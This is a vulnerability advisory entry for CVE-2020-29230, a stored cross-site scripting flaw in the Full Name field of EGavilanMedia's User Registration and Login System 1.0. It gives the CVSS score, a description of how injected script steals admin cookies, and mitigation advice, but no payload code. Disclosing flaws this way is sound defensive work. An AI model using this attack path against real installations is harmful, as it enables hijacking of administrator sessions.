PT-2020-17113 · Egavilanmedia · Egavilanmedia User Registration/Login System With Admin Panel

Hemant Patidar

Published

2020-12-30

Updated

2021-01-04

CVE-2020-29230

CVSS v3.1

6.1

Medium

Vector

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Name of the Vulnerable Software and Affected Versions EGavilanMedia User Registration and Login System With Admin Panel version 1.0

Description The issue affects the Admin Panel, specifically the Manage User tab, where an attacker can inject a cross-site scripting (XSS) payload using the Full Name of the user. This allows the attacker to steal cookies when the admin visits the manage user section, based on the crafted payload.

Recommendations For EGavilanMedia User Registration and Login System With Admin Panel version 1.0, consider restricting the input for the Full Name field in the User Registration section to prevent XSS payload injection, and avoid using the Manage User tab until a fix is available. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

Exploit

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-79

Related Identifiers

CVE-2020-29230

Affected Products

Egavilanmedia User Registration/Login System With Admin Panel

PT-2020-17113 · Egavilanmedia · Egavilanmedia User Registration/Login System With Admin Panel

CVE-2020-29230

Weakness Enumeration

Related Identifiers

Affected Products

References · 5